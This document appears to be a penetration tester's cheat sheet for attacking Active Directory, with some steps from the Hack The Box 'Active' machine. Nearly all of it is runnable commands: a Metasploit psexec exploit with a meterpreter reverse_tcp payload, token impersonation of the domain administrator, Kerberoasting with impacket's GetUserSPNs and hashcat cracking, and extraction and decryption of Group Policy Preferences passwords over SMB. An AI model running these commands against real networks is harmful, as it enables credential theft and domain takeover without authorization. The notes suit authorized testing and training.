Active Directory

// AD
python
conn=socket.create_connection(('10.129.238.232',23)) 

curl -v telnet://10.129.238.232:23


use exploit/windows/smb/psexec
set target 2
set payload windows/x64/meterpreter/reverse_tcp
options
set LOST eth0
load double tab
list_tokens -u
impersonate domain\\administrator
rev2self

Kerberoasting
/opt/impacket/examples
python GetUserSPNs.py domain.local/username:password -dc-ip 192.168.1.1 -request

python GetUserSPNs.py <DOMAIN/username:password> -dc-ip <ip of DC> -request

copy hash
hashcat --help | grep Kerberos
hashcat64.exe -m 13100 hash4.txt rockyou.txt -O


GPP (group policy preferences) attack:
Group Policy preferences allowed admins to create policies using embedded credential
These credentials were encrypted and placed in a "cPassword"
the key was accidentally released (whoops) and subsequently patched in MS14-025, but doesn't prevent previous uses

any foothold on any domain system will result in a leak of all credentials stored in group policy preferences.

https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/

use smb_enum_gpp
run

HTB - "Active" machine
smbclient -L \\\\10.10.10.100\\

smbclient -L \\\\10.10.10.100\\Replication
recursive off
mget *

gpp-decrypt hash